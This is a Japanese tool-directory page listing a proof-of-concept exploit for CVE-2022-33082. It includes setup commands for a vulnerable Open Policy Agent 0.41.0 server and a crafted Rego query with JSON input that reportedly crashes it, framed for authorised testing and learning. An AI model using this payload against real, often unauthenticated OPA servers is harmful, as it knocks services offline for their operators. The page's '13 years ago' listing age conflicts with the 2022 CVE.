Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-33082-exploit — CVE-2022-33082 の概念実証エクスプロイト。細工された入力を介して、Open Policy Agent バージョン ≤0.41.0 にサービス拒否を引き起こします。許可されたテストおよび教育目的での使用を意図しています。 | Kitploit
ツール/GitHubGitHub/cyberqueenmeg/cve-2022-33082-exploit
脆弱性分析エクスプロイトウェブセキュリティ学習と教育
GitHubcyberqueenmeg/cve-2022-33082-exploit

cve-2022-33082-exploit

CVE-2022-33082 の概念実証エクスプロイト。細工された入力を介して、Open Policy Agent バージョン ≤0.41.0 にサービス拒否を引き起こします。許可されたテストおよび教育目的での使用を意図しています。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
13年前未レビュー

CVE 2022-33082 エクスプロイト

免責事項

このコードは倫理的な目的、つまり脆弱性を理解し、自身のシステムまたは許可されたシステムをテストするために提供されています。これを使用することにより、あなたは倫理的に行動することに同意し、もし倫理的に行動しなかった場合、私は一切の責任を負いません。

このエクスプロイトはOpen Policy Agent (OPA) バージョン0.41.0以下で動作します。Linux上でOPAインスタンスをインストールしてテストするには、以下のコマンドを使用してください:

curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static

chmod +x opa

./opa run --server

次に、Webブラウザで localhost:8181 にアクセスします。以下の内容をそれぞれのフィールドに入力してください

クエリフィールド (Goコード): p := [input() | input := 1]

{ "input":"put this in the input (json) field!" }

その後、Webサイトはクラッシュし、サーバーを実行しているターミナルはカーネルパニックを報告します

影響

OPAサーバーのバージョン0.41.0以下にWebアクセスできる人は誰でも、サーバーを完全にクラッシュさせることができます。このサーバーはデフォルトではパスワードで保護されていません。

ツールをダウンロード